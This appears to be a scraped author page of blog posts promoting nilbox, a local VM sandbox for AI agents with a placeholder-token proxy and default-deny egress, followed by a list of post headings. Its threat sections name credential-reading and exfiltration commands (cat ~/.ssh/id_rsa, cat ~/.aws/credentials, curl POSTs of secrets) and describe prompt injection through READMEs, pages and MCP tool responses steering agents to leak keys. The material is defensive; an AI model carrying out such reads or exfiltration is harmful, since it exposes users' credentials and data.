A mac mini is, again, different. It's a normal desktop OS with a normal network stack. By default OpenClaw running on a mac mini has full reach into the public internet — and your LAN. nilbox is more secure than a mac mini on the network axis too.

"Why not just use a VM or a container?"

It's a fair question. Honest answer:

	Process isolation	Token protection	Network control	One-click install for non-developers
Plain VM (VirtualBox, etc.)	✓	✗	✗	✗
Docker container	Partial (shared kernel)	✗	✗	✗
Cloud OSS sandbox (E2B, etc.)	✓	✗	Varies	✗
nilbox	✓ (VM-grade)	✓	✓	✓

A VM or a container gives you a "room" for OpenClaw to live in. Inside that room, the token is still in plaintext, the network is still wide open, and — most importantly — none of those tools is one-click for someone who has never heard of them. Security tools that nobody installs are not security tools.

I went deeper into this comparison in a separate piece: Which Sandbox Should You Use for Your AI Agent? — VM vs Docker vs OSS vs nilbox.

Real Problem 2 — Installation: "Hope Is Not a Threat Model"

The real bottleneck on security turns out to be usability.

Write down, honestly, the path a Windows user has to walk to run OpenClaw cleanly:

Enable hardware virtualization (some people end up in BIOS).
Install WSL or a separate VM.
Install a Linux distribution inside it.
Resolve dependencies — Node, Python, Playwright browser binaries, and so on.
Now paste the one-line OpenClaw install command.

Trivial for a developer. For someone without a development background, that whole path is the challenge. A "one-line install" is only one line on the surface; underneath it sits a stack of assumptions. If any of them goes sideways, the user shrugs, decides "this isn't for me," and runs OpenClaw directly on their main OS. That's the scariest outcome of all.

nilbox's answer is small.

Download the nilbox desktop app on Windows (or macOS, or Linux).
Click once.
OpenClaw is installed inside a safe sandbox, alongside Playwright (browser automation environment) ready to go.

That's it. No WSL, no BIOS detour, no Docker daemon, no dependency triage. The virtualization layer is something nilbox sets up; the OpenClaw install itself is encapsulated as a vetted one-liner inside the nilbox catalog.

The catalog will keep growing. Adding more open-source projects that pair well with OpenClaw — one-click installable from inside nilbox — is the next part of the roadmap. Security tools are only security tools when someone actually runs them, and powerful tools like OpenClaw are only powerful when someone is actually able to install them.

Demo

A demo of nilbox installing OpenClaw in one click and running it safely with no real token inside the sandbox:

One-click nilbox install + OpenClaw running safely inside the sandbox.

Supplementary material:

GitHub repo (boundary proxy, VM image, store manifest — all open source): github.com/rednakta/nilbox
Site: nilbox.run
Docs: docs.nilbox.run

What I Learned

A few things I didn't quite expect going in.

The real bottleneck on sandbox security was usability. "More secure tooling" loses to "tooling more people can actually use." The reason "buy a mac mini" became a folk answer wasn't that it was actually safe — it was that "a physically separate machine" is the most intuitive isolation model for a non-technical user. The real work was carrying that same intuition into a single click on the user's existing computer.
VMs and containers are spoken about as if they were synonyms for "sandbox," but they're empty on two important axes — token isolation and egress control. Just naming those two axes separately changed how the conversation went.
Default-deny networking is the sweet spot between safety and usability. Block everything is unusable; allow everything is unsafe. "Block, then explicitly allow" is a model normal users already understand from firewalls.
Open-sourcing the boundary mattered more than I expected. Users don't have to "trust me" — they can read the code that swaps the token, and the code that decides which requests are allowed out. That is a much stronger default than a marketing claim.

ClawCon Michigan

I did not attend ClawCon Michigan.

The Open-Source Local Sandbox Agents, MCP Servers, and Unknown Apps Actually Need

rednakta — Sat, 25 Apr 2026 02:27:48 +0000

There's a conversation developers keep having right now, and it's the same conversation in three different disguises.

"How do I run this AI agent without it nuking my repo?" "How do I try this MCP server without handing a stranger's code my shell?" "How do I check out this random GitHub project without installing half of it into my laptop?"

Three questions, one answer. All three are untrusted code running as you, on your machine, with your files and your tokens. That's the same trust class. It deserves the same response: a local sandbox you can install in one click.

Not a cloud API you pipe prompts into. Not a closed-source "trust us" runtime. A sandbox whose boundary is on disk, whose source is on GitHub, and whose kill switch is a window you close.

And as far as we can tell, nothing of that exact shape existed until now. nilbox is — to our knowledge — the first cross-platform GUI sandbox for AI agents, MCP servers, and untrusted apps: one installer for Windows, one for macOS, one for Linux, the same VM and the same boundary inside each. The source lives in the open at github, so the boundary is something you can read rather than something you have to take on faith.

TL;DR

Agents, MCP servers, and unknown apps collapse to one problem: untrusted code running on your host as you.
Cloud sandboxes don't fit desktop workflows; closed-source sandboxes don't fit the trust model you're trying to establish in the first place.
The right shape is local + one-click: VM-grade isolation on your own machine, no round-trip to somebody else's cluster, with a readable source you can audit if you want to.
nilbox ships that — to our knowledge, the first cross-platform GUI sandbox of this kind shipping real installers on Windows, macOS, and Linux. Debian-based VM, Zero Token boundary so the real API key never enters the sandbox, default-deny egress. Source is up at github.com/rednakta/nilbox for transparency.

Three workloads, one threat model

Stop thinking of these as three separate problems. They're one problem with three surfaces.

AI agents. The agent reads a web page, decides what to execute, and runs it. The "decision" is a language model's token stream. That means every external input — a README, a PDF, an HTML page, the output of a tool call — is a potential instruction. Prompt injection is not a rare exploit; it's how untrusted text is supposed to work against a model that was trained on "helpfully follow instructions." The agent is one injected sentence away from cat ~/.ssh/id_rsa or curl -X POST with your secrets.

MCP servers. MCP is great. It's also a protocol for letting an agent call code somebody else wrote and you didn't read. Two independent risks compound here:

The MCP server itself is a binary you just ran. If it's hostile, it's already inside your agent's trust boundary the moment you start it.
The responses an MCP server returns are text the agent will treat as tool output — and often, downstream, as context for the next model call. A malicious response is a prompt injection carrier with extra steps.

So MCP isn't a safer category than agents. It's an amplifier: more third-party code paths, more injection surfaces, more tokens in play.

Unknown apps. The oldest version of the problem. The curl | bash install for a CLI you want to evaluate. The GitHub repo a coworker forwarded. The binary in a Slack DM. The npm package whose name you half-remember. You want to try it without installing it — without writing it into your PATH, your dotfiles, your keychain, your browser session.

The threat shape is the same across all three. Untrusted code, your credentials, your network, your home directory. Same trust class, same answer.

:::warning[The framing trap]
It's tempting to build three different answers — a coding-agent sandbox, an MCP runner, a try-before-you-install jail. Don't. That's three half-finished security boundaries you have to keep in sync forever. One sandbox that all three run inside is less to maintain and less to get wrong.
:::

Why local matters

The "local" word is doing real work in the sentence above. Drop it and the sandbox stops being the right tool for desktop AI workloads — for reasons that have less to do with security and more to do with how a developer's environment actually works.

The dev environment is the work. Your editor, your terminal, your services on localhost, your shell aliases, your git checkout, the node_modules you spent eleven minutes resolving — that's what the agent should be touching. Cloud sandboxes ask you to ship a snapshot somewhere else, run the agent there, and reconcile the result back. A local sandbox just runs alongside you. The agent reads the repo you're already reading, edits the files you can see in your editor, and its work shows up as git diff lines you can review before they leave your branch.

Portability. A laptop is the developer's actual environment, full stop. The plane, the cafe, the captive-portal hotel wifi, the corporate VPN that won't let HTTPS out to certain hosts, the off-network box you log into from a different country — wherever the laptop goes, the work goes. A local sandbox goes with it. A cloud sandbox needs network reachability, an active account, and someone else's uptime.

Ownership of side-effects. When a local agent writes a file, the file is on your disk. When it edits a config, you git diff it before committing. When the experiment goes nowhere, you git stash and walk away. No remote session to clean up, no detached state on a server, no sync conflict between a cloud copy and a local copy. The agent's work is just work in your repo, treated like work you'd have done yourself.

The cloud-sandbox category has its place — hosted code interpreters, backend agent platforms, anything where the sandbox is part of a product you're shipping. That's not this post. This post is about the sandbox you need, sitting between your laptop and the things you don't trust yet.

(A small aside on the source side of things: nilbox's boundary proxy, VM image, and store manifest are all in a public GitHub repo. Not as a marketing pitch, just as transparency — if you're going to trust a security boundary, being able to read it beats taking someone's word for it.)

What a "good enough" local sandbox has to do

Four things. If any of them is missing, the sandbox is incomplete.

Kernel-level isolation. Not just namespaces. A container escape is a host compromise, and LLM output is the exact kind of untrusted code that historically finds those bugs. VM-grade (hypervisor, microVM, whatever you want to call it) is the minimum.
Token leak prevention. The real API key must not enter the sandbox. If it does, prompt injection and malicious packages both win — the kernel boundary doesn't protect a credential the process is authorized to read.
Default-deny egress. The sandbox should reach the LLM provider you actually use and not much else. An agent that can POST anywhere on the internet is one tool call away from exfiltration, regardless of how isolated the process itself is.
Covers all three workloads. Agent loops, MCP servers, and ad-hoc unknown apps have to run in the same environment, under the same boundary. If MCP servers require their own isolation mechanism, you'll skip it.

A fifth, softer requirement: one-click install on the OS you actually use. Security tools nobody runs are not security tools. If installing the sandbox is a multi-evening adventure in WSL, Docker daemons, or hypervisor kernel modules, your teammates will just run the agent on the host and hope. Hope is not a threat model.

How nilbox implements it

nilbox is built exactly for this shape: a local sandbox for agents, MCP servers, and unknown apps, with the source kept open in the same repo.

The sandbox itself is a Debian-based VM called Linux for nilbox. One-click install on macOS, Windows, and Linux — no WSL gymnastics, no Docker daemon, no "please enable virtualization in your BIOS" side-quest. The desktop app handles hypervisor setup, disk provisioning, and the shell handoff. When the window is open, the sandbox is running; when it's closed, it isn't.

To our knowledge this is the first sandbox of this shape that ships a real desktop GUI on all three platforms rather than an API or a CLI. Docker has a desktop app but isn't kernel-isolated; VMware and VirtualBox are cross-platform but not purpose-built for agents; cloud sandbox APIs are purpose-built but neither local nor GUI. Source is up at github.com/rednakta/nilbox if you'd rather read the boundary than take our word for it.

Zero Token Architecture is the second layer. The agent inside the sandbox never sees the real API key. You hand it a placeholder — literally OPEN_API_TOKEN=OPEN_API_TOKEN — and a boundary proxy substitutes the real token outside the sandbox, right before the outbound call leaves your machine:

If the sandbox leaks its environment — prompt injection, a malicious dependency, a curious env tool call — what escapes is a string that equals its own variable name. You can't call an LLM with it, you can't charge anybody's account with it, you can't even prove which vendor it was for. The full argument lives in the Zero Token Architecture write-up.

MCP servers run inside the same sandbox as the agent. That's the whole point of picking a single boundary — MCP isn't a separate trust domain, it's more code in the already-untrusted pile. When the agent talks to the MCP server, both are inside Linux for nilbox; when either talks to the outside world, both hit the same boundary proxy and the same egress policy.

Unknown apps work the same way. Install the app into the sandbox via the store or a shell session. Try it, poke it, let it install things in its own home directory. If it turns out to be hostile, the blast radius is a Debian VM on a disk image you can delete. Your host ~/.ssh, your keychain, your browser cookies — never in scope.

That's the full picture: one VM, one boundary, three workloads.

	Kernel isolation	Token leak prevention	Egress allow-list	Fits agent + MCP + unknown app	One-click desktop GUI
Raw VM	✓	✗	✗ (manual)	✓	✗
Docker container	Partial	✗	✗ (manual)	Mostly	✗
Cloud sandbox API	✓	✗	Varies	Agent-only, usually	✗
nilbox	✓ (VM)	✓	✓	✓	✓

If you're wondering how these four break down in more detail, the sandbox comparison post walks through each category and where it holds up.

The verdict

One sandbox. Three workloads. Local, so it fits your desktop workflow and your file tree. Default-secure, so the agent inside doesn't have the real API key, can't POST to arbitrary hosts, and can't reach out of the VM into your home directory. The source sits on GitHub if you ever want to verify any of that for yourself.

If you've been running agents, MCP servers, or sketchy binaries directly on your host because the "real" solution felt like too much setup — this is the setup. It's a window you open on your laptop.

github.com/rednakta/nilbox

Which Sandbox Should You Use for Your AI Agent?

rednakta — Wed, 22 Apr 2026 11:34:53 +0000

Let's stop pretending this is a nice-to-have.

If you're running an AI agent in 2026 — OpenClaw, a Claude Code clone, a custom LangChain loop, anything that writes code and runs it — the agent is executing untrusted output on your machine. Not "might execute." Is executing. Every pip install, every shell command, every "let me just try this quick fix" is the agent acting on tokens a language model chose.

That makes the sandbox question non-negotiable. The only real question left is which sandbox.

TL;DR

AI agents run untrusted, model-generated code — a sandbox isn't optional, it's the baseline.
Your four realistic options: a Virtual Machine, a Docker container, a purpose-built OSS sandbox (E2B, Daytona, Firecracker-based), or a Zero Token Architecture runtime like nilbox.
VM, Docker, and most OSS sandboxes isolate the process just fine — none of them protect the API token, the network egress, or defend against prompt injection exfiltrating secrets.
nilbox is the only one that ships with all three out of the box, at the cost of being scoped to desktop AI agents.

Why an AI agent sandbox is non-negotiable

Here's the threat surface, concretely:

The agent runs code you didn't write. LLM-generated, copy-pasted from a model's decision tree, installed from an ecosystem like npm or PyPI that has a documented history of supply-chain attacks.
Prompt injection is unsolved. A README, an HTML page, a PDF, an MCP tool response — any of them can carry instructions that your model decides to follow.
Files leak. Source code, .env files, SSH keys, browser cookies, anything under the user's home directory is one cat ~/.aws/credentials away from an egress call.
Your internal network is reachable. An agent running on your laptop sits on the same LAN as your NAS, your router admin panel, your work VPN's reachable subnets.

Running an AI agent directly on your host OS in 2026 is the same decision class as running a random .exe from a forum in 2005. The sandbox isn't paranoia. It's the minimum.

So — which sandbox?

The quick comparison

	Kernel-level isolation	API token leak prevention	Built-in egress firewall	Prompt-injection token defense	One-click cross-OS GUI
Virtual Machine (VirtualBox, VMware, etc.)	✓	✗	✗ (manual)	✗	✗
Docker container	Partial (shared kernel)	✗	✗ (manual)	✗	✗
OSS sandboxes (E2B, Daytona, Firecracker-based, etc.)	Varies	✗	Varies	✗	✗ (API-first)
nilbox (Zero Token + Linux for nilbox)	✓ (VM)	✓	✓	✓	✓

Now the deep dives. Each contender, same structure: how it isolates, where it genuinely holds up, where it breaks for AI agents specifically, and who it's actually best for.

Virtual Machine

How it isolates. A hypervisor gives the guest its own kernel, filesystem, and memory. From the host's point of view, the agent is running inside something that looks like a completely separate computer.

Where it holds up. VMs are the most battle-tested isolation primitive we have. Decades of hardened attack-surface research, strong kernel boundary, snapshot-and-revert is free, and if the guest gets rooted your host is still mostly fine. For running arbitrary binaries with no assumptions about their behavior, a VM is the heavyweight gold standard.

Where it breaks for AI agents. The problem is that a VM isolates the process, not the credentials the process needs to do its job. To run an agent that talks to OpenAI or Anthropic, you have to inject the real API key into the VM. Once it's in there:

Prompt injection can convince the agent to echo $OPEN_API_TOKEN into its next response.
A malicious dependency can POST process.env to a remote server.
The VM's network egress is wide open by default — no firewall, no allow-list, the guest can reach any URL that resolves.

VMs also lose on ergonomics. Installing one is a multi-step adventure, setup drifts between users, and nobody on your team is going to spin one up correctly every single time.

Best for. Long-running workloads where you need full OS isolation and have the operational muscle to run a real VM infrastructure. Not great as a daily driver for desktop AI agents.

Docker container

How it isolates. Docker uses Linux kernel namespaces and cgroups to give the container its own view of processes, network, and filesystem, while sharing the host kernel.

Where it holds up. Fast. Ubiquitous. Reproducible. A Dockerfile gives you a pinned environment that works the same on every team member's machine. The tooling is unreasonably good, and the ecosystem of pre-built images covers almost any runtime an agent might need.

Where it breaks for AI agents. Three independent problems:

Shared kernel. A container escape is a host compromise. There's been a steady trickle of these for a decade. For untrusted code — which is what LLM output is — a container is a weaker boundary than a VM.
Tokens live in env vars. You pass the real API key via -e OPEN_API_TOKEN=sk-... or a Docker secret mount, and now the agent process can read it directly. Every token-leak vector that applies to a VM applies here.
Egress is uncontrolled. By default a container can reach the full internet and, on most setups, your LAN. Locking that down means building a second Docker network, running a proxy sidecar, or configuring iptables — doable, but nobody actually does it consistently.

Best for. CI pipelines, reproducible dev environments, any team that already lives in Docker and wants fast iteration. A reasonable component of an agent sandbox — not a complete one.

Other open-source sandboxes

Covering E2B, Daytona, Firecracker-based microVM projects, and the broader category of purpose-built "run LLM-generated code safely" projects.

How they isolate. Varies by project. Some wrap Docker (weaker kernel boundary, same issues). Some use Firecracker or similar microVM technology (stronger, closer to VM-grade isolation). Some are pure userland jails.

Where they hold up. These are the only tools on this list purpose-built for running AI-generated code. Cold-start is measured in milliseconds, the APIs are clean, and the better ones (microVM-backed) give you VM-grade isolation with container-grade ergonomics. If you're shipping a hosted code-interpreter product, this is the correct category.

Where they break for AI agents. Almost all of them are API-first and cloud-hosted:

The API token is still real. Whether you pass it as an env var to the sandbox runtime or as a header to the hosted API, the agent inside eventually sees the real key. Prompt injection and malicious packages still win.
Egress firewall varies wildly. Some projects let you allow-list hostnames; most assume the caller will configure this correctly. "Some assembly required" is not a security posture.
No desktop integration. These are infrastructure primitives. If you want a GUI, you build it.
Cloud-hosted variants move your code off-box. Which may or may not be fine depending on your compliance story, but it's a separate conversation you now have to have.

Best for. Server-side agent platforms, hosted code interpreters, teams shipping an AI product where the sandbox is part of their backend. Wrong shape for a desktop developer running agents on their own machine.

nilbox — Zero Token Architecture + Linux for nilbox

How it isolates. Two layers. First, a dedicated Debian-based VM called Linux for nilbox that runs the agent — same hypervisor-grade isolation as a raw VM, but installed with one click on Windows, macOS, or Linux. Second, a boundary proxy that implements Zero Token Architecture: the agent never sees the real API key.

The short version of Zero Token (I wrote the full argument here): instead of handing the agent OPEN_API_TOKEN=sk-proj-real-..., you hand it OPEN_API_TOKEN=OPEN_API_TOKEN. Yes, the value is literally the variable's own name. The boundary proxy intercepts outbound calls, recognizes the placeholder, swaps in the real token (stored encrypted outside the agent), and forwards upstream.

┌───────────┐   OPEN_API_TOKEN   ┌──────────┐   sk-proj-real   ┌──────┐
│  Agent    │  ───────────────▶  │ Boundary │  ──────────────▶ │ LLM  │
└───────────┘                    └──────────┘                  └──────┘

Where it holds up. It closes all three of the gaps the other options leave open:

Token leak prevention. Prompt injection can exfiltrate every environment variable the agent has. What escapes is OPEN_API_TOKEN=OPEN_API_TOKEN — a useless string. The attacker can't call the LLM with it, can't charge your account, can't even prove which vendor it was for.
Egress firewall built in. The boundary refuses outbound traffic that doesn't go through the token-substitution path, which also catches "the agent is trying to call an arbitrary URL" as a side effect.
One-click cross-platform GUI. No WSL, no Docker CLI, no VM setup wizard. Install the desktop app, click install on OpenClaw or your agent of choice, done.

Where it breaks / trade-offs. nilbox is scoped to desktop AI agents. It isn't a server-side code-interpreter product, it isn't a Firecracker replacement, and the ecosystem is younger than Docker or VMware by a couple of decades. If you're shipping a hosted service, this isn't your tool. If you're running an agent on your own laptop, it is.

Best for. Desktop developers running AI agents who want defense-in-depth — token leak prevention, network egress control, and VM isolation — without assembling the three themselves.

Decision matrix

If you need…	Pick
Full OS isolation for arbitrary binaries, operational team to run it	Virtual Machine
Reproducible dev environments, fast iteration, existing Docker muscle	Docker
Backend sandbox for a hosted AI product or code-interpreter service	E2B / Daytona / Firecracker-based OSS sandbox
Desktop AI agents with token + network + prompt-injection defense out of the box	nilbox

No row says "everything." That's the honest answer. Docker wins on ergonomics, VMs win on maturity, Firecracker-class sandboxes win on purpose-built isolation, and nilbox wins on defense-in-depth for the desktop AI-agent use case specifically.

The verdict

Every option on this list gives you some isolation. Only one of them also assumes your agent will leak its API key, pivot to your network, and echo your secrets back into a prompt response — and designs around it.

Here's the rule: whatever you pick, measure it against token leakage, egress control, and prompt-injection exfiltration, not just "does it isolate the process?" A process-level sandbox that still hands the agent a real sk-proj-... is an incomplete answer. The agent doesn't need to escape the sandbox to cost you money or leak data — it just needs to talk on the network with credentials it shouldn't have.

If you're rolling your own, bolt a local proxy + placeholder token + egress allow-list onto your Docker or VM setup. If you'd rather not build that, nilbox is open source and ships the full stack for desktop agents. Either way: stop running agents without a sandbox, and stop calling a sandbox complete when the agent inside it still holds your real API key.

Previously, on the same theme: Your AI Agent Doesn't Need Your API Key.

Zero Token Architecture: Why Your AI Agent Should Never See Your Real API Key

rednakta — Sat, 18 Apr 2026 10:59:02 +0000

Hot take: every AI agent security guide I've read is solving the wrong problem.

We spend hours sandboxing the runtime. We lock down the filesystem. We audit every package. We wrap the agent in Docker, then wrap Docker in a VM, then wrap the VM in policy.

And then we hand the agent a plaintext API key and call it secure.

Stop protecting the token. Just don't hand it over.

TL;DR

Prompt injection + arbitrary package execution means any token your AI agent can see is a token it can leak.
Instead of protecting the token after the agent has it, pass the agent a fake token whose value equals its own name.
Intercept the agent's outbound API call at the boundary and swap in the real token there.
If the fake leaks, the attacker gets a useless string. The real token never leaves your trusted process.

The problem with "protect the token"

Here's what an AI agent's environment typically looks like:

OPEN_API_TOKEN=sk-proj-1a2b3c4d5e...

That's a real, working key. The agent reads it, puts it in an Authorization: Bearer header, and makes calls. Fine — until any of these happen:

Prompt injection convinces the agent to echo $OPEN_API_TOKEN into its next response.
A malicious npm/pip package the agent installed reads process.env and POSTs it to a server far, far away.
The agent writes a log file that happens to include the header it just sent.
A tool call returns the token because the model decided it would be helpful.

Every mitigation we reach for — sandboxes, permission prompts, egress filtering, audit logs — is downstream of the mistake. The mistake is that the secret exists inside a process we do not trust.

You cannot perfectly contain a value inside a process that runs arbitrary, model-generated code. You just can't. So stop trying.

The paradigm flip

Ask a different question:

What if the agent never had the real token in the first place?

This sounds impossible, because API calls need tokens. But the agent doesn't need the real token — it just needs the call to succeed. If something else substitutes the real token on the way out, the agent's world is unchanged.

That something else is a tiny proxy sitting between your agent and the upstream LLM. Let's call it the boundary.

Before

# In the agent's environment
OPEN_API_TOKEN=sk-proj-1a2b3c4d5e...

The real token sits inside the agent. Compromise the agent, compromise the token.

After

# In the agent's environment
OPEN_API_TOKEN=OPEN_API_TOKEN

That's not a typo. The variable's value is its own name. The agent reads it, builds Authorization: Bearer OPEN_API_TOKEN, sends the request. It has no idea anything is weird.

The boundary intercepts the outbound call, recognizes the placeholder, swaps in the real token (which lives encrypted, outside the agent's reach), and forwards the request upstream.

┌───────────┐   OPEN_API_TOKEN   ┌──────────┐   sk-proj-real   ┌──────┐
│  Agent    │  ───────────────▶  │ Boundary │  ──────────────▶ │ LLM  │
└───────────┘                    └──────────┘                  └──────┘
     ▲                                                              │
     │                         response                             │
     └──────────────────────────────────────────────────────────────┘

From the agent's perspective: totally normal request, totally normal response. From the attacker's perspective, there's nothing worth stealing.

The hacker scenario

Let's pretend the worst happened. Prompt injection, malicious dependency, whatever — the attacker exfiltrates everything in the agent's environment.

Old world:

OPEN_API_TOKEN=sk-proj-1a2b3c4d5e...

Game over. Billable incidents. Rotation storm. PagerDuty at 3am.

New world:

OPEN_API_TOKEN=OPEN_API_TOKEN

Congratulations, they got a string. They can't call the LLM with it. They can't charge your account with it. They can't even prove which vendor it was for without extra context.

The leak still happened. We simply made the leaked value worthless.

This is the same logic as a one-time password or a macaroon: assume the secret will escape, and design so that escaping it costs the attacker nothing and you nothing.

Why this matters right now

Three trends collide:

Agents are running untrusted code. Tool use, code interpreters, and "install this skill" flows mean agent processes routinely execute arbitrary inputs.
Prompt injection is not solved. It's not going to be solved by a better system prompt. Treat agent processes as adversarial, always.
Tokens are expensive. A leaked OpenAI or Anthropic key is not just a credential breach, it's a bill.

Every AI agent stack I see ships with the real token in an env var because that's how twelve-factor apps work. Agents aren't twelve-factor apps. They're sandboxes for arbitrary model output, except the sandbox is "a language model promised to be careful."

The fix isn't a better sandbox. The fix is not putting the secret in the sandbox in the first place.

How to apply this

If you're rolling your own agent harness:

Put a local HTTP proxy between your agent and any upstream API.
Give the agent a placeholder token (KEY=KEY works fine).
Store the real secret outside the agent's process — OS keychain, a separate daemon, whatever.
In the proxy, match on the placeholder and substitute the real bearer before forwarding.
Refuse to forward requests that didn't come through the expected placeholder — this also catches agents trying to call arbitrary URLs.

If you'd rather not build this yourself, this idea is the spine of nilbox, an open-source desktop runtime for AI agents. It bundles the proxy, VM isolation, and an encrypted token store so any agent you install can't see your keys — even if it wants to. The full write-up lives in the Zero Token Architecture docs.

The takeaway

The whole security conversation around AI agents is framed as "how do we protect the token we gave the agent?" That's the wrong question.

The right question is: why did we give it a token at all?

If the agent never had it, the agent can't leak it. Everything else is downstream.

DEV Community: rednakta

Don't Put Your Brokerage Key Inside an AI Agent

The Answer: Four Boundaries Before Live Trading

Why This Became Urgent

The Core Problem Is Not That AI Might Be Wrong

Why .env Is the Wrong Shape for Financial Agents

A Separate Machine Does Not Solve the Token Problem

The Architecture That Actually Fits

1. Run the Agent Inside a Sandbox

2. Keep the Real Token Outside the Agent

3. Make Networking Default-Deny

4. Let the Agent Propose Orders, Not Execute Them

Practical Checklist

Where nilbox Fits

Closing

Further reading

Top 10 Local AI Agents You Can Run on Your PC in 2026

OpenClaw Cleared 345k Stars in 8 Weeks. Then the Ecosystem Showed Up.

Why This Category Exploded in 2026

The 10 at a Glance

1. OpenClaw — The One That Started Everything

2. NanoClaw — The Slim, Container-Isolated Rewrite

3. Hermes Agent — The One That Learns

4. Nanobot — OpenClaw's Core in 4,000 Lines

5. ZeroClaw — Rust Single-Binary

6. NullClaw — The Bare-Metal Pick

7. IronClaw — WebAssembly All the Way Down

8. PicoClaw — The Textbook Minimum

9. Moltworker — Cloudflare-Style Serverless Variation

10. memU — The Memory Layer

The Sandbox Question Underneath All Ten

One nilbox Install Replaces Ten Sandbox Configurations

Three Honest Exceptions

How to Choose in Two Minutes

FAQ

Try It

Further Reading

Stop Installing MCP Servers on Your Laptop — Here's a One-Click Sandbox for Claude

The MCP Install Path Is an Arbitrary-Code-Execution Invitation

Two Hard Requirements

What I Built

Demo: Running server-filesystem Inside nilbox

Bare Host vs nilbox: How the Attack Story Differs

What This Doesn't Solve

Try It

Further Reading

Buy a mac mini to Run OpenClaw? Anyone Can Get a Safer Sandbox in 1 Minute

What I Built

How I Used OpenClaw

Real Problem 1 — Security: "Process Isolation Is Not Where the Story Ends"

What's missing 1: Token isolation

What's missing 2: Network egress control

"Why not just use a VM or a container?"

Real Problem 2 — Installation: "Hope Is Not a Threat Model"

Demo

What I Learned

ClawCon Michigan

Further reading

The Open-Source Local Sandbox Agents, MCP Servers, and Unknown Apps Actually Need

TL;DR

Three workloads, one threat model

Why local matters

What a "good enough" local sandbox has to do

How nilbox implements it

The verdict

Which Sandbox Should You Use for Your AI Agent?

TL;DR

Why an AI agent sandbox is non-negotiable

The quick comparison

Virtual Machine

Docker container

Other open-source sandboxes

nilbox — Zero Token Architecture + Linux for nilbox

Decision matrix

The verdict

Zero Token Architecture: Why Your AI Agent Should Never See Your Real API Key

TL;DR

The problem with "protect the token"

The paradigm flip

Before

Why `.env` Is the Wrong Shape for Financial Agents

Demo: Running `server-filesystem` Inside nilbox